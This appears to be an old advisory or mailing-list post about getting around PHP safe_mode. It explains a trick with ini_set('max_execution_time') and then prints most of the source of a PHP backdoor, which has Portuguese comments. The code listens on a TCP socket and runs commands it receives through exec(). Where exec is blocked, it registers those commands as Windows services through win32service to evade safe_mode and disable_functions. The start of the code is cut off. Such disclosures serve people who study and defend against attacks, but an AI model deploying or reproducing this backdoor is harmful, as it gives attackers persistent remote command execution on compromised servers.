when safe_mode = on, set_time_limit is "off", then we can use=0D
ini_set("max_execution_time", 90000000);=0D
=0D
suppose the server is vulnerable PHP injection, then  an attacker make a backdoor in PHP and register it in SCM of windows with win32service extension.=0D
=0D
the backdoor need wait for connections, if safe_mode = on, then it can use ini_set("max_execution_time", quantity) instead  set_time_limit(0), because safe_mode block this.=0D
=0D
example of backdoor that use this technique:=0D
=0D
$n,'display'=>$n,=0D
  'path'=>$cmd_local,'params'=>"/c $cmd >\"$name\""));=0D
 =0D
  win32_start_service($n);=0D
  win32_stop_service($n);=0D
  win32_delete_service($n);=0D
  $content=file_get_contents($name);=0D
  unlink($name);=0D
 =0D
  return $content;=0D
 }=0D
=0D
 function execConfig() {=0D
  $safe_mode = ini_get("safe_mode");=0D
  $disable_functions = ini_get("disable_functions");=0D
  // se for possivel utiliza a funcao exec=0D
  if ($safe_mode == 0 && (eregi("exec", $disable_functions) === false) ) {=0D
   $this->exec = "exec";=0D
  }=0D
  //se nao tenta burlar safe_mode e/ou disable_functions, caso a extensao win32service esteja habilitada=0D
  else {=0D
   if (extension_loaded('win32service')) {=0D
    $this->exec = "execCommand";=0D
   }=0D
   else {=0D
    $this->exec = "impossivel";=0D
   }=0D
  }=0D
 }=0D
=0D
 =0D
 function errCatch() {=0D
  exit(socket_strerror(socket_last_error()) . socket_last_error());=0D
 }=0D
=0D
 function listen() {=0D
  $socket;=0D
  $socket_stream;=0D
  $input_socket;=0D
  $socket = socket_create(AF_INET,SOCK_STREAM,SOL_TCP) or $this->errCatch();=0D
  socket_bind($socket,'127.0.0.1', 666) or $this->errCatch();=0D
  socket_listen($socket, 5) or $this->errCatch();=0D
 =0D
 =0D
  do {=0D
   $socket_stream = socket_accept($socket);=0D
   if ($socket_stream === false) {=0D
    continue 1;=0D
   }=0D
   // so passa caso alguem se conecte, ai vem a mensagem de boas vindas=0D
   $msg = NEW_LINE . "Bem vindo ao backdoor PHPShell" . NEW_LINE . "Para sair, escreva 'quit'. Para desligar o backdoor, digite 'shutdown'". NEW_LINE;=0D
  socket_write($socket_stream, $msg, strlen($msg));=0D
  =0D
  =0D
   // aqui trata a sessao=0D
   do {=0D
    $input_socket = socket_read($socket_stream,1000,PHP_NORMAL_READ) or=0D
    $this->errCatch();=0D
   =0D
   =0D
    $input_socket = trim($input_socket);=0D
    if (empty($input_socket)) {=0D
      continue 1; # goto sessao=0D
    }=0D
=0D
    switch ($input_socket) {=0D
     case "quit":=0D
      socket_close($socket_stream);=0D
      break 2; # goto sessao=0D
     case "shutdown":=0D
      socket_close($socket_stream);=0D
      socket_close($socket);=0D
      break 3; # goto termina=0D
    }=0D
   =0D
    // caso os comandos nao sejam quit nem shutdown=0D
   =0D
    if ($this->exec == "execCommand") {=0D
     $this->result = $this->execCommand($input_socket);=0D
    }=0D
   =0D
    if ($this->exec == "exec") {=0D
     $output = "";=0D
     $result_complete = "";=0D
     $value = "";=0D
    =0D
     exec($input_socket, $output);=0D
     foreach ($output as $value) {=0D
      $result_complete .= "$value" . NEW_LINE;=0D
     }=0D
    =0D
     $this->result = $result_complete;=0D
    }=0D
   =0D
    if ($this->exec == "impossivel") {=0D
     $this->result = NEW_LINE . "Nao foi possivel executar comandos, safe_mode=on e extensao win32service desabilitada, caso conheca outro modo de burlar safe_mode, edite o backdoor" . NEW_LINE;=0D
    }=0D
   =0D
    if ($this->result) { // pra caso result esteja vazio o socket nao gerar erro e fexar sessao=0D
     socket_write($socket_stream,$this->result, strlen($this->result)) or=0D
     $this->errCatch();=0D
    }=0D
  =0D
   } while(true);=0D
   #sessao=0D
  =0D
  } while(true);=0D
  #termina=0D
 =0D
 }=0D
=0D
 function Backdoor() {=0D
  $this->exec = "";=0D
  $this->result = "";=0D
  $this->execConfig();=0D
  socket_clear_error();=0D
  $this->listen();=0D
 }=0D
=0D
}=0D
=0D
$backdoor = new Backdoor();=0D
?>